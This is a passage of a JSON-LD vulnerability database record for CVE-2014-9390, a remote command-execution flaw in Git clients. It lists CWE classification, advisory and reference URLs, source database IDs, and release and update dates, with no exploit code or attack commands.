"CNNVD-201412-509", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1.9, }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.6, url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { trust: 2.6, url: "https://news.ycombinator.com/item?id=8769667", }, { trust: 1.8, url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { trust: 1.8, url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { trust: 1.8, url: "http://mercurial.selenic.com/wiki/whatsnew", }, { trust: 1.8, url: "http://securitytracker.com/id?1031404", }, { trust: 1.8, url: "http://support.apple.com/kb/ht204147", }, { trust: 1.8, url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, { trust: 1.8, url: "https://libgit2.org/security/", }, { trust: 1.4, url: "https://nvd.nist.gov/vuln/detail/cve-2014-9390", }, { trust: 0.9, url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9390", }, { trust: 0.3, url: "http://git.or.cz/", }, { trust: 0.2, url: "https://www.apple.com/support/security/pgp/", }, { trust: 0.2, url: "https://developer.apple.com/xcode/downloads/", }, { trust: 0.2, url: "https://support.apple.com/kb/ht1222", }, { trust: 0.2, url: "http://gpgtools.org", }, { trust: 0.2, url: "http://creativecommons.org/licenses/by-sa/2.5", }, { trust: 0.2, url: "https://security.gentoo.org/", }, { trust: 0.2, url: "https://bugs.gentoo.org.", }, { trust: 0.2, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9390", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/20.html", }, { trust: 0.1, url: "https://github.com/timcharper/git_osx_installer", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=36837", }, { trust: 0.1, url: "https://usn.ubuntu.com/2470-1/", }, { trust: 0.1, url: "https://security.gentoo.org/glsa/201509-06", }, { trust: 0.1, url: "http://article.gmane.org/gmane.linux.kernel/1853266'],", }, { trust: 0.1, url: "http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],", }, { trust: 0.1, url: "https://github.com/rapid7/metasploit-framework", }, { trust: 0.1, url: "https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],", }, { trust: 0.1, url: "http://mercurial.selenic.com/wiki/httpcommandprotocol", }, { trust: 0.1, url: "http://selenic.com/hg/file/tip/mercurial/wireproto.py", }, { trust: 0.1, url: "http://mercurial.selenic.com/wiki/whatsnew#mercurial_3.2.3_.282014-12-18.29'],", }, { trust: 0.1, url: "https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],", }, { trust: 0.1, url: "http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],", }, { trust: 0.1, url: "http://metasploit.com/download", }, { trust: 0.1, url: "http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']", }, { trust: 0.1, url: "http://schacon.github.io/gitbook/7_how_git_stores_objects.html", }, { trust: 0.1, url: "http://schacon.github.io/gitbook/7_browsing_git_objects.html", }, { trust: 0.1, url: "https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],", }, { trust: 0.1, url: "http://mercurial.selenic.com/wiki/bundleformat", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3068", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-9462", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3069", }, { trust: 0.1, url: "https://security.gentoo.org/glsa/201612-19", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3105", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3069", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3068", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-3630", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3105", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-3630", }, { trust: 0.1, url: "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9462", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/advisories/", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0546.html", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8108", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3580", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3522", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-3528", }, ], sources: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-77335", }, { db: "VULMON", id: "CVE-2014-9390", }, { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "PACKETSTORM", id: "129677", }, { db: "PACKETSTORM", id: "133704", }, { db: "PACKETSTORM", id: "129784", }, { db: "PACKETSTORM", id: "140059", }, { db: "PACKETSTORM", id: "131193", }, { db: "PACKETSTORM", id: "130744", }, { db: "CNNVD", id: "CNNVD-201412-509", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-02-12T00:00:00", db: "VULHUB", id: "VHN-77335", }, { date: "2020-02-12T00:00:00", db: "VULMON", id: "CVE-2014-9390", }, { date: "2014-12-19T00:00:00", db: "BID", id: "71732", }, { date: "2020-03-09T00:00:00", db: "JVNDB", id: "JVNDB-2014-008933", }, { date: "2014-12-20T01:29:10", db: "PACKETSTORM", id: "129677", }, { date: "2015-09-25T06:55:36", db: "PACKETSTORM", id: "133704", }, { date: "2015-01-02T12:02:22", db: "PACKETSTORM", id: "129784", }, { date: "2016-12-07T16:38:00", db: "PACKETSTORM", id: "140059", }, { date: "2015-03-31T15:43:41", db: "PACKETSTORM", id: "131193", }, { date: "2015-03-10T16:22:37", db: "PACKETSTORM", id: "130744", }, { date: "2014-12-25T00:00:00", db: "CNNVD", id: "CNNVD-201412-509", }, { date: "2020-02-12T02:15:10.963000", db: "NVD", id: "CVE-2014-9390", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-09-09T00:00:00", db: "VULHUB", id: "VHN-77335", }, { date: "2021-05-17T00:00:00", db: "VULMON", id: "CVE-2014-9390", }, { date: "2015-10-26T16:46:00", db: "BID", id: "71732", }, { date: "2020-03-09T00:00:00", db: "JVNDB", id: "JVNDB-2014-008933", }, { date: "2021-07-09T00:00:00", db: "CNNVD", id: "CNNVD-201412-509", }, { date: "2024-11-21T02:20:45.663000", db: "NVD", id: "CVE-2014-9390", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "140059", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], trust: 0.7, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Remote for multiple products Git Vulnerability to execute arbitrary command on server", sources: [ { db: "JVNDB", id: "JVNDB-2014-008933", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Input Validation Error", sources: [ { db: "BID", id: "71732", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], trust: 0.9, }, }